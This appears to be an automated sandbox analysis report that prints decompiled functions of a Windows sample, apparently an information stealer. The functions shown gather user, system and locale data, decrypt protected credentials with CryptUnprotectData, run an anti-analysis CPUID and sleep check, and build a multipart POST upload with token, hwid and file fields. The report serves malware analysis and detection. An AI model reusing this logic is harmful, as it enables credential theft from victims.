lstrcat.KERNEL32(0040CFD3,004467B0), ref: 0041F0BA
lstrcat.KERNEL32(0040CFD3,?), ref: 0041F0C8
lstrcat.KERNEL32(0040CFD3,004458A4), ref: 0041F0D4

Part of subcall function 00423BF0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00423D5C

lstrcat.KERNEL32(0040CFD3,00000000), ref: 0041F0FD
lstrcat.KERNEL32(0040CFD3,004458A0), ref: 0041F12F
Process32Next.KERNEL32 ref: 0041F13D
CloseHandle.KERNEL32(00000000), ref: 0041F14C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$Process32$Next$CloseCreateFirstHandleIos_base_dtorSnapshotToolhelp32std::ios_base::_
String ID:
API String ID: 968569211-0
Opcode ID: 42c0a7b698bdd069ca57e4a198759d72824aa49f681367799e07d8fe5fe3680e
Instruction ID: 0533ad063c4131d993b4a038d94d5414167a142b663c9cc2ce1fab38f188d792
Opcode Fuzzy Hash: 42c0a7b698bdd069ca57e4a198759d72824aa49f681367799e07d8fe5fe3680e
Instruction Fuzzy Hash: 3631A571900608EFDB10EF65DC49AEF7BB8FF86715F00417AF40197250D7785A458B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EED8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0041EED8(void* __ebx, void* __edi, signed int __esi) {
				void* _t22;
				intOrPtr _t23;
				void* _t29;
				intOrPtr _t30;
				signed int _t31;
				intOrPtr _t32;
				signed int _t33;
				void* _t35;
				void* _t36;

				_t31 = __esi;
				_t29 = __edi;
				_t22 = __ebx;
				do {
					_t28 =  *(_t22 + _t31 * 4) & 0x0000ffff;
					GetLocaleInfoA( *(_t22 + _t31 * 4) & 0x0000ffff, 2, _t33 - 0x204, 0x200); // executed
					if(_t29 == 0) {
						_t28 =  *(_t33 - 0x208);
						wsprintfA( *(_t33 - 0x208), "%s", _t33 - 0x204);
						_t36 = _t35 + 0xc;
					} else {
						wsprintfA( *(_t33 - 0x208), "%s / %s",  *(_t33 - 0x208), _t33 - 0x204);
						_t36 = _t35 + 0x10;
					}
					_t29 = _t29 + 1;
					E0042A2F0(_t33 - 0x204, 0, 0x200);
					_t31 = _t31 + 1;
					_t35 = _t36 + 0xc;
				} while (_t31 <  *((intOrPtr*)(_t33 - 0x20c)));
				if(_t22 != 0) {
					LocalFree(_t22);
				}
				_pop(_t30);
				_pop(_t32);
				_pop(_t23);
				return E0042A36A( *(_t33 - 0x208), _t23,  *(_t33 - 4) ^ _t33, _t28, _t30, _t32);
			}

0x0041eed8
0x0041eed8
0x0041eed8
0x0041eee0
0x0041eee0
0x0041eef3
0x0041eefb
0x0041ef1c
0x0041ef2f
0x0041ef35
0x0041eefd
0x0041ef11
0x0041ef17
0x0041ef17
0x0041ef46
0x0041ef47
0x0041ef4c
0x0041ef4d
0x0041ef50
0x0041ef5a
0x0041ef5d
0x0041ef5d
0x0041ef6c
0x0041ef6d
0x0041ef70
0x0041ef79

APIs

GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000010,?), ref: 0041EEF3
wsprintfA.USER32 ref: 0041EF11
wsprintfA.USER32 ref: 0041EF2F
_memset.LIBCMT ref: 0041EF47
LocalFree.KERNEL32(00000000,?,00000010,?), ref: 0041EF5D

Strings

%s / %s, xrefs: 0041EF0B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: wsprintf$FreeInfoLocalLocale_memset
String ID: %s / %s
API String ID: 3205847202-2910687431
Opcode ID: 491a72c61534ae8f8f89bdc1edbb6e46023569c75b1839ffb2e538f83de352bf
Instruction ID: 7032402da4ae99651ad5e02652e37e50327c8eaa38c2e37983d0c42f61941461
Opcode Fuzzy Hash: 491a72c61534ae8f8f89bdc1edbb6e46023569c75b1839ffb2e538f83de352bf
Instruction Fuzzy Hash: CA012B75600318ABDF20DB50DC89FEA7378EB44701F0000D6FE1992182EB7859808A56

Uniqueness

Uniqueness Score: -1.00%

Function 00424100 Relevance: 7.6, APIs: 5, Instructions: 134
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00424100(void* __ecx, void* __eflags, intOrPtr* _a4, char _a8, intOrPtr _a28) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				void* _v32;
				void* _v48;
				intOrPtr _v56;
				void* _v60;
				short _v76;
				struct _WIN32_FIND_DATAW _v668;
				void* _v672;
				char _v676;
				intOrPtr* _v680;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t52;
				WCHAR* _t55;
				void* _t56;
				void* _t58;
				void* _t69;
				intOrPtr _t80;
				intOrPtr _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				signed int _t107;
				void* _t108;
				void* _t109;
				void* _t110;

				_push(0xffffffff);
				_push(E0043FC4A);
				_push( *[fs:0x0]);
				_t109 = _t108 - 0x298;
				_t51 =  *0x451f00; // 0xc21d6f0a
				_t52 = _t51 ^ _t107;
				_v20 = _t52;
				_push(_t52);
				 *[fs:0x0] =  &_v16;
				_t105 = _a4;
				_v680 = _t105;
				_v676 = 0;
				_v8 = 1;
				_t55 = E00423960(__ecx,  &_v76,  &_a8);
				if(_t55[0xa] >= 8) {
					_t55 =  *_t55;
				}
				_t56 = FindFirstFileW(_t55,  &_v668); // executed
				_v672 = _t56;
				if(_v56 >= 8) {
					_push(_v76);
					E0042A289();
					_t109 = _t109 + 4;
				}
				_v56 = 7;
				_v60 = 0;
				_v76 = 0;
				 *_t105 = 0;
				 *((intOrPtr*)(_t105 + 4)) = 0;
				 *((intOrPtr*)(_t105 + 8)) = 0;
				_t97 =  &(_v668.cFileName);
				_v676 = 1;
				_v28 = 7;
				_v32 = 0;
				_v48 = 0;
				_t58 = E0042DEE3( &(_v668.cFileName));
				_t110 = _t109 + 4;
				E0041F350( &_v48,  &(_v668.cFileName), _t58);
				_v8 = 2;
				E00424010( &_v48);
				_v8 = 1;
				if(_v28 >= 8) {
					_t97 = _v48;
					_push(_v48);
					E0042A289();
					_t110 = _t110 + 4;
				}
				while(FindNextFileW(_v672,  &_v668) != 0) {
					_v28 = 7;
					_v32 = 0;
					_v48 = 0;
					_t69 = E0042DEE3( &(_v668.cFileName));
					_t110 = _t110 + 4;
					E0041F350( &_v48,  &(_v668.cFileName), _t69);
					_v8 = 3;
					E00424010( &_v48);
					_v8 = 1;
					if(_v28 >= 8) {
						_push(_v48);
						E0042A289();
						_t110 = _t110 + 4;
					}
					_t97 = _v672;
				}
				if(_a28 >= 0x10) {
					_push(_a8);
					E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t103);
				_pop(_t106);
				_pop(_t80);
				return E0042A36A(_t105, _t80, _v20 ^ _t107, _t97, _t103, _t106);
			}

0x00424103
0x00424105
0x00424110
0x00424111
0x00424117
0x0042411c
0x0042411e
0x00424124
0x00424128
0x0042412e
0x00424133
0x00424139
0x00424147
0x0042414e
0x0042415b
0x0042415d
0x0042415d
0x00424167
0x0042416d
0x00424176
0x0042417b
0x0042417c
0x00424181
0x00424181
0x0042418b
0x0042418e
0x00424191
0x00424195
0x00424197
0x0042419a
0x0042419d
0x004241a6
0x004241b0
0x004241b3
0x004241b6
0x004241ba
0x004241bf
0x004241cd
0x004241d8
0x004241dc
0x004241e5
0x004241e9
0x004241eb
0x004241ee
0x004241ef
0x004241f4
0x004241f4
0x0042420d
0x00424219
0x0042421c
0x0042421f
0x00424223
0x00424228
0x00424236
0x00424241
0x00424245
0x0042424e
0x00424252
0x00424257
0x00424258
0x0042425d
0x0042425d
0x00424260
0x00424274
0x0042427c
0x00424281
0x00424282
0x00424287
0x0042428f
0x00424297
0x00424298
0x00424299
0x004242a7

APIs

Part of subcall function 00423960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,0040AE75,?,?,?), ref: 0042398E
Part of subcall function 00423960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004239C4
Part of subcall function 00423960: _wcslen.LIBCMT ref: 004239E1

FindFirstFileW.KERNEL32(00000000,?,?,?,C21D6F0A,0000000F,?,00000000), ref: 00424167
_wcslen.LIBCMT ref: 004241BA
FindNextFileW.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00424205
_wcslen.LIBCMT ref: 00424223
FindNextFileW.KERNEL32(?,?,?,?,00000000), ref: 0042426E

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: FileFind_wcslen$ByteCharMultiNextWide$First
String ID:
API String ID: 2626462088-0
Opcode ID: 06688db8993d718b00d38d23b1af7b6c0dff6a4612e52d50dd8cf5866201cad5
Instruction ID: 58a6f73f1c8ccf3fd90caaea78dace26481029be8ad87413fbe6bfeed24b343f
Opcode Fuzzy Hash: 06688db8993d718b00d38d23b1af7b6c0dff6a4612e52d50dd8cf5866201cad5
Instruction Fuzzy Hash: 195192B1E00218DFDB10DFA5D889ADEF7B8EF59304F50816EE409A3250D7789A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00409EC0 Relevance: 7.6, APIs: 5, Instructions: 64
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409EC0(char** _a4, DWORD* _a8, BYTE* _a12, int _a16) {
				char* _t11;
				char** _t20;
				BYTE* _t26;
				DWORD* _t28;

				_t26 = _a12;
				if(_t26 != 0) {
					_t28 = _a8;
					if(CryptBinaryToStringA(_t26, _a16, 0x40000001, 0, _t28) != 0) {
						_t11 = RtlAllocateHeap(GetProcessHeap(), 0,  *_t28); // executed
						_t20 = _a4;
						 *_t20 = _t11;
						if(_t11 != 0) {
							E0042A2F0(_t11, 0,  *_t28);
							return CryptBinaryToStringA(_t26, _a16, 0x40000001,  *_t20, _t28) & 0xffffff00 | _t14 != 0x00000000;
						} else {
							return 0;
						}
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x00409ec4
0x00409ec9
0x00409ed4
0x00409ee9
0x00409efe
0x00409f04
0x00409f07
0x00409f0b
0x00409f1a
0x00409f3f
0x00409f0d
0x00409f13
0x00409f13
0x00409eeb
0x00409ef0
0x00409ef0
0x00409ecb
0x00409ecf
0x00409ecf

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00409EE1

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 00bbe0c7b7b52e07a63020ade8597ea11624688d72460244b44df408bf0a874d
Instruction ID: c119f3927dce285e25b765d7d1ba78a11c0aec280acfa99baa51bc745ab9bf3d
Opcode Fuzzy Hash: 00bbe0c7b7b52e07a63020ade8597ea11624688d72460244b44df408bf0a874d
Instruction Fuzzy Hash: 4201C072200215BBEF109FA9FC85FAB37ACEFC2324F00002AF908D7241D2B09C5186A5

Uniqueness

Uniqueness Score: -1.00%

Function 00420120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00420120(intOrPtr __ebx, intOrPtr __edi, void* __eflags, signed int __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				struct _SYSTEMTIME _v36;
				short _v38;
				short _v42;
				short _v46;
				short _v50;
				char _v52;
				intOrPtr _v60;
				char _v80;
				struct _TIME_ZONE_INFORMATION _v252;
				char _v253;
				signed long long _v260;
				void* __esi;
				signed int _t30;
				signed int _t31;
				void* _t38;
				intOrPtr _t43;
				void* _t55;
				intOrPtr _t57;
				signed int _t58;
				void* _t59;

				_t54 = __edi;
				_t43 = __ebx;
				_t30 =  *0x451f00; // 0xc21d6f0a
				_t31 = _t30 ^ _t58;
				_v20 = _t31;
				 *[fs:0x0] =  &_v16;
				_t56 = _a4;
				_v260 = 0;
				_v36.wYear = 0;
				_v36.wMonth = 0;
				_v36.wDay = 0;
				_v36.wMinute = 0;
				_v36.wMilliseconds = 0;
				GetSystemTime( &_v36);
				GetTimeZoneInformation( &_v252); // executed
				_t53 =  &_v36;
				_v52 = 0;
				_v50 = 0;
				_v46 = 0;
				_v42 = 0;
				_v38 = 0;
				 *0x464910( &_v252,  &_v36,  &_v52, _t31, _t55,  *[fs:0x0], E0043F638, 0xffffffff); // executed
				asm("fild dword [ebp-0xf8]");
				asm("fchs");
				_v260 = __fp0 /  *0x446900;
				 *((intOrPtr*)(_t59 - 0xf4)) = _v260;
				_t38 = E00423D90(__edi,  &_v80,  &_v52); // executed
				_v8 = 0;
				E00404DB0( &_v253, _a4, "UTC", _t38);
				if(_v60 >= 0x10) {
					_t53 = _v80;
					_push(_v80);
					E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t57);
				return E0042A36A(_t56, _t43, _v20 ^ _t58, _t53, _t54, _t57);
			}

0x00420120
0x00420120
0x00420137
0x0042013c
0x0042013e
0x00420146
0x0042014c
0x00420155
0x0042015f
0x00420163
0x00420166
0x00420169
0x0042016c
0x00420170
0x0042017d
0x00420189
0x0042018c
0x00420190
0x00420193
0x00420196
0x00420199
0x004201a5
0x004201ab
0x004201bb
0x004201bd
0x004201c9
0x004201d3
0x004201df
0x004201e6
0x004201f2
0x004201f4
0x004201f7
0x004201f8
0x004201fd
0x00420205
0x0042020d
0x0042021b

APIs

GetSystemTime.KERNEL32 ref: 00420170
GetTimeZoneInformation.KERNEL32(00000010), ref: 0042017D
TzSpecificLocalTimeToSystemTime.KERNEL32(00000010,?,?), ref: 004201A5

Part of subcall function 00423D90: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00423E69

Part of subcall function 00404DB0: _strlen.LIBCMT ref: 00404DC0

Strings

UTC, xrefs: 004201D9

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Time$System$InformationIos_base_dtorLocalSpecificZone_strlenstd::ios_base::_
String ID: UTC
API String ID: 3110953754-2754919731
Opcode ID: bb8d6d0ced6d5b560c7024a97683ebe368f75972d6ca5af58797105fa4193a33
Instruction ID: 8bd25407e80027751b161234863aed83b5339089e3409c53ae5a4d5a32f4102f
Opcode Fuzzy Hash: bb8d6d0ced6d5b560c7024a97683ebe368f75972d6ca5af58797105fa4193a33
Instruction Fuzzy Hash: 17312AB1D10219DFDF14DFA4E845BEEBBB8FF08300F40456AE419A3640EB745658CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401090 Relevance: 5.0, APIs: 4, Instructions: 38
sleepCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00401090(long __edx) {
				long* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				long _t17;
				long _t21;
				long* _t23;

				_t21 = __edx;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0xffffffff;
				_v8 =  &_v24;
				Sleep(1); // executed
				Sleep(1); // executed
				Sleep(1);
				Sleep(1);
				_t23 = _v8;
				asm("cpuid");
				 *_t23 = 1;
				_t23[1] = _t17;
				_t23[2] = 0;
				_t23[3] = _t21;
				return _v16 >> 0x0000001f & 0x00000001;
			}

0x00401090
0x004010a0
0x004010a3
0x004010a6
0x004010ae
0x004010b5
0x004010b8
0x004010bc
0x004010c0
0x004010c4
0x004010c6
0x004010d0
0x004010d2
0x004010d4
0x004010d7
0x004010da
0x004010ee

APIs

Sleep.KERNEL32(00000001), ref: 004010B8
Sleep.KERNEL32(00000001), ref: 004010BC
Sleep.KERNEL32(00000001), ref: 004010C0
Sleep.KERNEL32(00000001), ref: 004010C4

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ca7835050a4ed44a9503b98fa8a3de0e782fafdb96b2e7f1749429dd5fe79356
Instruction ID: 956e94d440e875f492182f795421cbe7eb399afa5c92bedd211580c739d5f894
Opcode Fuzzy Hash: ca7835050a4ed44a9503b98fa8a3de0e782fafdb96b2e7f1749429dd5fe79356
Instruction Fuzzy Hash: 42F03C71D003189FCB10EFA998416AEBFF4EB08320F10816E9559E7681D6B269408F91

Uniqueness

Uniqueness Score: -1.00%

Function 00415040 Relevance: 4.5, APIs: 3, Instructions: 49
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00415040(intOrPtr _a4, intOrPtr _a8, void** _a12, long* _a16) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				void* _t16;
				long _t19;
				void* _t20;
				void* _t28;

				_v16 = _a4;
				_v20 = _a8;
				_t16 =  *0x464768( &_v20, 0, 0, 0, 0, 0,  &_v12); // executed
				_t28 = _t16;
				if(_t28 != 0) {
					_t19 = _v12;
					_t30 = _a16;
					 *_a16 = _t19;
					_t20 = LocalAlloc(0x40, _t19);
					 *_a12 = _t20;
					if(_t20 != 0) {
						E0042B8D0(_t20, _v8,  *_t30);
					}
				}
				return LocalFree(_v8) & 0xffffff00 | _t28 != 0x00000000;
			}

0x00415059
0x00415062
0x00415065
0x0041506b
0x0041506f
0x00415071
0x00415075
0x0041507b
0x0041507d
0x00415086
0x0041508a
0x00415094
0x00415099
0x0041509c
0x004150b0

APIs

CryptUnprotectData.CRYPT32(0043EEE3,00000000,00000000,00000000,00000000,00000000,?), ref: 00415065
LocalAlloc.KERNEL32(00000040,?,0043EEE3,?,?,?,?,?,?,00000000,?,?,?,C21D6F0A,?), ref: 0041507D
LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,C21D6F0A,?), ref: 004150A1

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 76c34f97f760206e0da65a9a2f6bcc9d3226d0a64146e98612448cee73b92e23
Instruction ID: cfc2eef266de13fcbdff007045aea0b98b8bf642e90878a05281c20df78a19d0
Opcode Fuzzy Hash: 76c34f97f760206e0da65a9a2f6bcc9d3226d0a64146e98612448cee73b92e23
Instruction Fuzzy Hash: 5701407AA40309ABDB10DFA8DC45FAB77B9EBC8710F104559FA049B384EA75A9408B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD0 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041EDD0() {
				signed int _v8;
				char _v268;
				long _v272;
				signed int _t7;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t20;

				_t7 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t7 ^ _t20;
				_v272 = 0x101;
				GetUserNameA( &_v268,  &_v272); // executed
				return E0042A36A( &_v268, _t13, _v8 ^ _t20, _t17, _t18, _t19);
			}

0x0041edd9
0x0041ede0
0x0041edf1
0x0041edfb
0x0041ee14

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0041EDFB

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b227f6b22dfb66434aabb32e752d73e9c204c23b0a3ebc592e73d2e656709def
Instruction ID: 1b59c1a04b9450a1d7de6507aa8e6f4e4b607aaff198e58ee0c52a01d2b10f93
Opcode Fuzzy Hash: b227f6b22dfb66434aabb32e752d73e9c204c23b0a3ebc592e73d2e656709def
Instruction Fuzzy Hash: C1E04F3190411C9BCB10DF94EC45ADDB3B8EB19301F4042EAD98A93140EFB46AC88F89

Uniqueness

Uniqueness Score: -1.00%

Function 004011A0 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004011A0() {
				void* _v20;
				char _v40;
				struct _SYSTEM_INFO* _t3;

				_t3 =  &_v40;
				GetSystemInfo(_t3); // executed
				asm("sbb eax, eax");
				return  &(_t3->dwOemId.dwOemId);
			}

0x004011a6
0x004011aa
0x004011b4
0x004011ba

APIs

GetSystemInfo.KERNEL32(?), ref: 004011AA

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 87fb5921cade1baf56b3516703f8ae7e3fa2fe5a66ebae2063d86b8bae8e1d40
Instruction ID: a97c6007e47c99052d1778fdfca17d51ca6ff258e0d25f67b987decd0370cc91
Opcode Fuzzy Hash: 87fb5921cade1baf56b3516703f8ae7e3fa2fe5a66ebae2063d86b8bae8e1d40
Instruction Fuzzy Hash: A6C0123191420C878710EAA4590985A73EC9505106B4006B0D919D1000E772D9598691

Uniqueness

Uniqueness Score: -1.00%

Function 004144C0 Relevance: 166.7, APIs: 77, Strings: 18, Instructions: 485stringnetworkmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00414540
_memset.LIBCMT ref: 00414553
_memset.LIBCMT ref: 00414566
GetProcessHeap.KERNEL32(00000000,00800000,00000000,00000000,0043EC33,000000FF,?,0040C6B9,0045187C,00000000), ref: 00414575
RtlAllocateHeap.NTDLL(00000000,?,0040C6B9,0045187C,00000000), ref: 0041457C
_memset.LIBCMT ref: 00414592
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004145AF
InternetSetOptionA.WININET ref: 004145D3
StrCmpCA.SHLWAPI(00000000,https://), ref: 004145F3
lstrcat.KERNEL32(?,00000000), ref: 00414624
lstrcat.KERNEL32(00000000,00445DBC), ref: 00414630
lstrcat.KERNEL32(00000000,------), ref: 0041463C
lstrcat.KERNEL32(00000000,?), ref: 0041464A
lstrcat.KERNEL32(00000000,00445DB0), ref: 00414656
lstrcat.KERNEL32(00000000,00445DBC), ref: 00414662
lstrcat.KERNEL32(?,Cont), ref: 00414674
lstrcat.KERNEL32(?,ent-Typ), ref: 00414686
lstrcat.KERNEL32(?,e: multip), ref: 00414698
lstrcat.KERNEL32(?,art/for), ref: 004146AA
lstrcat.KERNEL32(?,m-data; ), ref: 004146BC
lstrcat.KERNEL32(?,boun), ref: 004146CE
lstrcat.KERNEL32(?,dary=), ref: 004146E0
lstrcat.KERNEL32(?,----), ref: 004146F2
lstrcat.KERNEL32(?,?), ref: 00414706
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0041472B
HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00400100,00000000), ref: 0041479A
lstrcat.KERNEL32(?,------), ref: 004147B6
lstrcat.KERNEL32(?,?), ref: 004147CA
lstrcat.KERNEL32(?,00445DBC), ref: 004147DC
lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 004147EE
lstrcat.KERNEL32(?,00445D28), ref: 00414800
lstrcat.KERNEL32(?,"), ref: 00414812
lstrcat.KERNEL32(?,00000000), ref: 00414842
lstrcat.KERNEL32(?,00445DBC), ref: 0041486F
lstrcat.KERNEL32(?,------), ref: 00414881
lstrcat.KERNEL32(?,?), ref: 00414895
lstrcat.KERNEL32(?,00445DBC), ref: 004148A7
lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 004148B9
lstrcat.KERNEL32(?,token), ref: 004148CB
lstrcat.KERNEL32(?,"), ref: 004148DD
lstrcat.KERNEL32(?,?), ref: 004148F1
lstrcat.KERNEL32(?,00445DBC), ref: 00414903
lstrcat.KERNEL32(?,------), ref: 00414915
lstrcat.KERNEL32(?,?), ref: 00414929
lstrcat.KERNEL32(?,00445DBC), ref: 0041493B
lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0041494D
lstrcat.KERNEL32(?,hwid), ref: 0041495F
lstrcat.KERNEL32(?,"), ref: 00414971
lstrcat.KERNEL32(?,?), ref: 00414985
lstrcat.KERNEL32(?,00445DBC), ref: 00414997
lstrcat.KERNEL32(?,------), ref: 004149A9
lstrcat.KERNEL32(?,?), ref: 004149BD
lstrcat.KERNEL32(?,00445DBC), ref: 004149CF
lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 004149E1
lstrcat.KERNEL32(?,file), ref: 004149F3
lstrcat.KERNEL32(?,"), ref: 00414A05
lstrlen.KERNEL32(00000000), ref: 00414A0C
lstrlen.KERNEL32(?), ref: 00414A1F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00414A38
RtlAllocateHeap.NTDLL(00000000), ref: 00414A3F
lstrlen.KERNEL32(?), ref: 00414A52
lstrlen.KERNEL32(?,?,?,00000002,?,00000004), ref: 00414A84
lstrlen.KERNEL32(00000000), ref: 00414A9A
lstrlen.KERNEL32(?,00000000,00000000), ref: 00414AA9
lstrlen.KERNEL32(?,?,00000000), ref: 00414AD5
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00414AE4
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00414AFD
StrCmpCA.SHLWAPI(?,200), ref: 00414B13
Sleep.KERNEL32(00007530), ref: 00414B22
_memset.LIBCMT ref: 00414B39
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00414B55
lstrcat.KERNEL32(?,00000000), ref: 00414B80
InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 00414B9A
InternetCloseHandle.WININET(00000100), ref: 00414BBB
InternetCloseHandle.WININET(?), ref: 00414BC2
InternetCloseHandle.WININET(?), ref: 00414BCF

Strings

----, xrefs: 004146E6
hwid, xrefs: 00414953
https://, xrefs: 004145D9
200, xrefs: 00414B07
Content-Disposition: form-data; name=", xrefs: 004147E2, 004148AD, 00414941, 004149D5
file, xrefs: 004149E7
e: multip, xrefs: 0041468C
dary=, xrefs: 004146D4
art/for, xrefs: 0041469E
------, xrefs: 00414636, 004147AA, 00414875, 00414909, 0041499D
HTTP/1.1, xrefs: 00414777, 0041478E
token, xrefs: 004148BF
", xrefs: 00414806, 004148D1, 00414965, 004149F9
boun, xrefs: 004146C2
ent-Typ, xrefs: 0041467A
POST, xrefs: 00414794
Cont, xrefs: 00414668
m-data; , xrefs: 004146B0

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$Internet$lstrlen$_memset$Heap$CloseHandleHttp$AllocateFileOpenProcessReadRequest$ConnectInfoOptionQuerySendSleep
String ID: "$----$------$200$Cont$Content-Disposition: form-data; name="$HTTP/1.1$POST$art/for$boun$dary=$e: multip$ent-Typ$file$https://$hwid$m-data; $token
API String ID: 2607785470-2796441379
Opcode ID: e27efcd1fd4c2329f4cb0a6f974353009579e7947fef5dc58add632765f86840
Instruction ID: 5d37defb4991e9591dfa1eeb626834e66911073670d77ab36ac6dca126eb6ad6
Opcode Fuzzy Hash: e27efcd1fd4c2329f4cb0a6f974353009579e7947fef5dc58add632765f86840
Instruction Fuzzy Hash: EF1284B594421CABDF50EBA0DC8CFEA77B8BF89701F044999F20593150EBB49A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00412D80 Relevance: 160.5, APIs: 79, Strings: 12, Instructions: 1294
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

